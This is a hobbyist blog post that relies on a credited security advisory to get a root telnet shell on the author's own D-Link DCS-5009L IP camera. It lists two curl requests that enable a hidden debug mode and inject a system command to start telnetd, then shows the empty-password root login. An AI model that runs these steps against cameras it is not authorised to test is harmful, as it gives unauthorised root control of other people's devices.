Archive for iot

Getting a root telnet prompt on D-Link DCS-5009L IP Camera

My dad thoughtfully sent me a DCS-5009L nanny cam to play around with yesterday. Naturally, the first thing I wanted to do was get to a root shell on the device. I quickly came across this security advisory from Tao Sauvage at IOActive. Thanks, Tao!

tl;dr plug in the camera, figure out its IP and start telnetd like this:

$ curl --data 'ReplySuccessPage=advanced.htm&ReplyErrorPage=errradv.htm&WebDebugLevel=0&WebFuncLevel=1180250000' -X POST http://admin@[CAMERA_IP]/setDebugLevel
$ curl --data 'ReplySuccessPage=home.htm&ReplyErrorPage=errradv.htm&SystemCommand=telnetd&ConfigSystemCommand=test' -X POST http://admin@[CAMERA_IP]/setSystemCommand
$ telnet [CAMERA_IP]
Trying 10.0.1.173...
Connected to 10.0.1.173.
Escape character is '^]'.
 
(none) login: admin
Password: [leave blank]
 
 
BusyBox v1.12.1 (2014-09-03 17:28:29 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.
 
#

Default username is admin with password empty.

Per Tao’s security advisor: in the first curl, 1180250000 is a magic constant that puts the device in a debugging mode where the /setSystemCommand HTTP endpoint is available. In the second curl, we use this endpoint to run telnetd.

Leave a Comment